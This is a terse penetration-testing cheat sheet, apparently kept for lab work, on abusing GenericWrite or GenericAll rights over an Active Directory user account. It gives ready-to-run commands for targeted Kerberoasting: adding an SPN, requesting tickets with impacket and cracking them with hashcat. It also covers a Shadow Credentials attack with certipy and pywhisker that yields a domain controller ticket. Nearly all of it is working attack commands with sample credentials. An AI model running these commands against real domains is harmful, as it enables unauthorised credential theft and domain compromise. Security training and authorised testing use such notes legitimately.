GenericWrite or GenericAll on user

Method 1 - Kerberoasting

Set user SPN and then try kerberoasting

Get-ADObject -Filter 'samAccountName -like "targetUser"' | Set-ADObject -Add @{ServicePrincipalName='pwn/pwn'}
Get-ADObject -Filter 'samAccountName -like "ethan"' -Property ServicePrincipalName

Sync time and do kerberoast

ntpdate -4 $ip
impacket-GetUserSPNs 'local.htb/user:password' -dc-ip $ip -request
sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

OR

faketime "$(ntpdate -q dc.local.htb | cut -d ' ' -f 1,2)" impacket-GetUserSPNs 'local.htb/username:password' -dc-ip $ip -request

Method2 - Shadow Credentials

1. Inject public key into user's account

2. Get TGT for a user

3. Set TGT as variable

Certipy

certipy-ad shadow auto -u krishna@ignite.local -p Password@1 -account dc$

PyWhisker

pywhisker -d "ignite.local" -u "krishna" -p "Password@1" --target "DC$" --action "add" --filename DC$
python gettgtpkinit.py -cert-pfx "/root/DC$.pfx" -pfx-pass eK2PeOlwG60EkPS2TNxX ignite.local/dc$ dc$.ccache
export KRB5CCNAME=/root/PKINITtools/dc\$.ccache